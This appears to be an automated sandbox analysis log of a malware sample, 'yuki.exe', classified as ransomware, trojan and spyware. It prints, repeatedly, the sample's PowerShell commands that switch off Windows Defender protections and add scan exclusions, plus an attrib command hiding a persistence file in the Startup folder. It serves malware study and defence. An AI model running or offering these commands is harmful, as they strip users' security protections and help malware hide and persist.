Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\python312.dll entropy: 7.9935958549Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\sqlite3.dll entropy: 7.99327545133Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_ec_ws.pyd entropy: 7.99870484557Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_imaging.cp312-win_amd64.pyd entropy: 7.99813744902Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\cryptography\hazmat\bindings\_rust.pyd entropy: 7.99962440624Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\cv2\cv2.pyd entropy: 7.99957832383Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\cv2\opencv_videoio_ffmpeg4100_64.dll entropy: 7.99997158125Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\luna.aes entropy: 7.99996042256Jump to dropped file
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82169640_2_00007FF6C8216964
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81F89E00_2_00007FF6C81F89E0
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8215C000_2_00007FF6C8215C00
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81F10000_2_00007FF6C81F1000
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82108C80_2_00007FF6C82108C8
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82021640_2_00007FF6C8202164
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82019440_2_00007FF6C8201944
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82039A40_2_00007FF6C82039A4
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C820DA5C0_2_00007FF6C820DA5C
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81FA2DB0_2_00007FF6C81FA2DB
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8201B500_2_00007FF6C8201B50
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82164180_2_00007FF6C8216418
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82108C80_2_00007FF6C82108C8
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8213C100_2_00007FF6C8213C10
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8202C100_2_00007FF6C8202C10
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81FA4740_2_00007FF6C81FA474
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81FACAD0_2_00007FF6C81FACAD
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8205D300_2_00007FF6C8205D30
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C820E5700_2_00007FF6C820E570
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8201D540_2_00007FF6C8201D54
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82035A00_2_00007FF6C82035A0
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8209EA00_2_00007FF6C8209EA0
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8215E7C0_2_00007FF6C8215E7C
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C820DEF00_2_00007FF6C820DEF0
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82197280_2_00007FF6C8219728
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C8201F600_2_00007FF6C8201F60
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82017400_2_00007FF6C8201740
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82087940_2_00007FF6C8208794
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81F98000_2_00007FF6C81F9800
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82118740_2_00007FF6C8211874
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82140AC0_2_00007FF6C82140AC
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C82080E40_2_00007FF6C82080E4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD98C931317_2_00007FFD98C93131
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75713100017_2_00007FF757131000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757155C0017_2_00007FF757155C00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75715696417_2_00007FF757156964
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF7571389E017_2_00007FF7571389E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75715187417_2_00007FF757151874
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF7571508C817_2_00007FF7571508C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF7571540AC17_2_00007FF7571540AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF7571480E417_2_00007FF7571480E4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75714174017_2_00007FF757141740
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75715972817_2_00007FF757159728
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75714879417_2_00007FF757148794
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757141F6017_2_00007FF757141F60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75713980017_2_00007FF757139800
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757155E7C17_2_00007FF757155E7C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757149EA017_2_00007FF757149EA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75714DEF017_2_00007FF75714DEF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757141D5417_2_00007FF757141D54
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757145D3017_2_00007FF757145D30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75714E57017_2_00007FF75714E570
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF7571435A017_2_00007FF7571435A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75715641817_2_00007FF757156418
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF7571508C817_2_00007FF7571508C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75713A47417_2_00007FF75713A474
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75713ACAD17_2_00007FF75713ACAD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757141B5017_2_00007FF757141B50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757142C1017_2_00007FF757142C10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF757153C1017_2_00007FF757153C10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75714DA5C17_2_00007FF75714DA5C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75713A2DB17_2_00007FF75713A2DB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75714194417_2_00007FF757141944
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF75714216417_2_00007FF757142164
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: 17_2_00007FF7571439A417_2_00007FF7571439A4
Source: C:\Users\user\Desktop\yuki.exeCode function: String function: 00007FF6C81F2710 appears 52 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrCode function: String function: 00007FF757132710 appears 52 times
Source: yuki.exeStatic PE information: invalid certificate
Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.17.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.0.drStatic PE information: No import functions for PE file found
Source: python3.dll.17.drStatic PE information: No import functions for PE file found
Source: yuki.exeBinary or memory string: OriginalFilename vs yuki.exe
Source: yuki.exe, 00000000.00000003.1671441009.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1740353628.0000021E0C701000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000000.1665421028.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGPUpdate.exej% vs yuki.exe
Source: yuki.exe, 00000000.00000003.1671911249.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1671538445.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1672057001.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_wmi.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1740087340.0000021E0C701000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs yuki.exe
Source: yuki.exe, 00000000.00000003.1670570244.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1670294212.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs yuki.exe
Source: yuki.exe, 00000000.00000003.1671171954.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1671750981.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1670906171.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1670737098.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1671986473.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1670466108.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs yuki.exe
Source: yuki.exe, 00000000.00000003.1671830181.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1670986185.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1671674830.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1671610008.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs yuki.exe
Source: yuki.exe, 00000000.00000003.1671087144.0000021E0C6FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_elementtree.pyd. vs yuki.exe
Source: yuki.exe, 00000001.00000000.1749173008.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameGPUpdate.exej% vs yuki.exe
Source: yuki.exeBinary or memory string: OriginalFilenameGPUpdate.exej% vs yuki.exe
Source: python312.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993773228216073
Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.997848412298387
Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.999059198943662
Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9935930524553571
Source: _cffi.cp312-win_amd64.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903342790920716
Source: backend_c.cp312-win_amd64.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9901811079545455
Source: _ec_ws.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9980750902889246
Source: _imaging.cp312-win_amd64.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9976277834008097
Source: _webp.cp312-win_amd64.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9902681466138329
Source: _generator.cp312-win_amd64.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9922289456233422
Source: python312.dll.17.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993773228216073
Source: sqlite3.dll.17.drStatic PE information: Section: UPX1 ZLIB complexity 0.997848412298387
Source: libcrypto-3.dll.17.drStatic PE information: Section: UPX1 ZLIB complexity 0.999059198943662
Source: libssl-3.dll.17.drStatic PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
Source: _cffi.cp312-win_amd64.pyd.17.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903342790920716
Source: unicodedata.pyd.17.drStatic PE information: Section: UPX1 ZLIB complexity 0.9935930524553571
Source: backend_c.cp312-win_amd64.pyd.17.drStatic PE information: Section: UPX1 ZLIB complexity 0.9901811079545455
Source: _ec_ws.pyd.17.drStatic PE information: Section: UPX1 ZLIB complexity 0.9980750902889246
Source: _imaging.cp312-win_amd64.pyd.17.drStatic PE information: Section: UPX1 ZLIB complexity 0.9976277834008097
Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.evad.winEXE@42/1555@4/3
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrMutant created: \Sessions\1\BaseNamedObjects\B
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402Jump to behavior
Source: yuki.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\yuki.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\Desktop\yuki.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile read: C:\Users\user\Desktop\yuki.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\yuki.exe "C:\Users\user\Desktop\yuki.exe"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Users\user\Desktop\yuki.exe "C:\Users\user\Desktop\yuki.exe"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr" /S
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr" /S
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Users\user\Desktop\yuki.exe "C:\Users\user\Desktop\yuki.exe"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr"Jump to behavior
Source: C:\Users\user\Desktop\yuki.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\AppData"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\user\Local"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr" /S
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe','.py'""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
